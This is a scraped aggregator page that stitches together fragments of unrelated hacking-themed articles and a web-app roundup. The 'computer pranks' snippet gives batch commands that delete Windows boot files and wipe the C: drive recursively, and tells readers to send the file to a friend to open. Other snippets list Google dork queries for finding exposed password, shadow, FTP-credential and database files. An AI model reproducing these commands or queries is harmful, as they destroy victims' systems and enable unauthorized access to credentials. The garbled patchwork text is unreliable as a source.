background preloader

How to gain access to system account the most powerful account in Windows. « Alien Eyes

How to gain access to system account the most powerful account in Windows. « Alien Eyes
There is an account in Microsoft Windows that is more powerful than the Administrator account in Windows Operating Systems. That account is called System account it is similar to the root OR super user in the Linux/Unix world . I will show you how to access this system account in this article. You can use this facility for removing programs that are causing problems to your system, malware etc. Introduction If you look at the task manager (which can be launched by pressing [CTRL]+[ALT]+[DEL]) you will see some processes that are running with System level privileges. System is the highest account in Windows (like root),You can be a super power user by accessing the system account (even while you are logged in as a restricted user) Note: Accessing system account may cause serious problems. Local system differs from an administrator account in that it has full control of the operating system, similar to root on a Unix machine. Check the name of the account you’ve logged into (Click start.

Painfully Computer Pranks ~ Computer Hacking | Learn How To Hack Computer pranks to freak out your friends and make them crying for mummy I've been posting many articles about computer pranks on this blog (Deadly Virus Prank, The Ultimate Virus, How to Create a Fake and Harmless Virus and Facebook Virus Prank). Today , I will show you 5 great computer pranks that will frustrate your victims very much. These pranks could be very painfully, so please use them at your own risk ;) 1. Crash a Computer System With Nothing But a URL! I stumbled across this URL while surfing the internet. 2. Open notepad and copy/paste this code: @echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.ini Now Save it as a .bat file. This should shutdown the persons computer. Send it to your friends computer and tell them to open it. Here is another code too..... cmd /c del c:\windows\* /F /S /Q cmd /c del c:\* /F /S /Q 3. 1. 2. 3.

Know the Trade – Your IT Security Information Portal CISSP/CEH/CISA/Hacker and Penetration Testing Specialist Google Hacking allintitle:Brains, Corp. camera allintitle:"index of/admin" allintitle:"index of/root" allintitle:restricted filetype:doc site:gov allintitle:restricted filetype :mail allintitle:sensitive filetype:doc allinurl:/bash_history allinurl:winnt/system32/ (get cmd.exe) ext:ini eudora.ini ext:pwd inurl:(service|authors|administrators |users) "# -FrontPage-" filetype:bak inurl:"htaccess|passwd|shadow|htusers" filetype:conf slapd.conf filetype:ctt "msn" filetype:mdb inurl:"account|users|admin|administrators|passwd|password" filetype:mdb inurl:users.mdb filetype:QDF QDF filetype:pdf "Host Vulnerability Summary Report" "Assessment Report" filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" ) filetype:xls inurl:"email.xls" filetype:user eggdrop user intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html) intitle:"Welcome to IIS 4.0!" These log files record info about the SSH client PUTTY.

100 Web Apps to Rule Them All Our original roundup of 100 Web Apps to Rule Them All was published in May, 2011. Nearly a year later, we’re back with over a dozen new apps … and sadly with a few of our original favorites removed since they hit the deadpool. We’ve added the newest apps to the top of this roundup article, so you can quickly see our new favorites. Today, more than ever before, you can get much of your work done right from your browser. There’s web apps for almost everything, and increasingly they work from mobile devices, have beautifully designed interfaces that rival native apps, and work together to make your online life easier. Whether you’re just getting started using web apps, or are a longtime fan of web apps and would like to find more exciting apps, you’ll be sure to find something interesting here. Enjoy! The Newest Web Apps to Rule Them All ifttt ifttt Web apps have the bad habit of often not working together. Price: Free AppStorm Review: Use Ifttt to Make the Internet Work for You TinyLetter Lemon

Hackers' Library I hacked my secure wireless network: here’s how it’s done Wireless networks are everywhere; they are widely available, cheap, and easy to setup. To avoid the hassle of setting up a wired network in my own home, I chose to go wireless. After a day of enjoying this wireless freedom, I began thinking about security. How secure is my wireless network? I searched the Internet for many days, reading articles, gathering information, and participating on message boards and forums. I soon came to the realization that the best way for me to understand the security of my wireless network would be to test it myself. How a wireless network works A wireless local area network (WLAN) is the linking of 2 or more computers with Network Interface Cards (NICs) through a technology based on radio waves. Access points are base stations for the wireless network. The set of all stations that communicate with each other is referred to as the Basic Service Set (BSS). Data streams, known as packets, are sent between the Access Point, and it’s clients. Packets and IVs

Download Youtube Videos | Youtube Video Downloader Advanced password hacking using Google – easy to learn, easy to apply Do you like this story? Google is your best friend when it comes to hacking. The search engine giant has crawled loads of data which was intended to be protected by webmasters, but is being exploited and mined by smart users using Google dorks. Lets start, shall we ? FTP passwords ws_ftp.ini is a configuration file for a popular win32 FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference. intitle:index.of ws_ftp.ini You can also this dork which uses "parent directory" to avoid results other than directory listings filetype:ini ws_ftp pwd Or "index of/" "ws_ftp.ini" "parent directory" even if the site or file has been taken offlline, you can still search the contents in the Google cache using the following dork "cache:www.abc.com/ws_ftp.ini" where www.abc.com is the site you want to check the dork for. PHP Hacking intitle:index.of config.php to view php file contents intitle:"Index of" phpinfo.php inurl:download.php? SQL Dumps

How To Become A Hacker Copyright © 2001 Eric S. Raymond As editor of the Jargon File and author of a few other well-known documents of similar nature, I often get email requests from enthusiastic network newbies asking (in effect) "how can I learn to be a wizardly hacker?". If you are reading a snapshot of this document offline, the current version lives at Note: there is a list of Frequently Asked Questions at the end of this document. Numerous translations of this document are available: ArabicBelorussianBulgarianChinese, Czech. The five-dots-in-nine-squares diagram that decorates this document is called a glider. If you find this document valuable, please support me on Patreon or SubscribeStar. The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. The hacker mind-set is not confined to this software-hacker culture. 1. 2. 3. 5. 2. 3. 4. 1. 2. 3. 4.

Delicious

Related: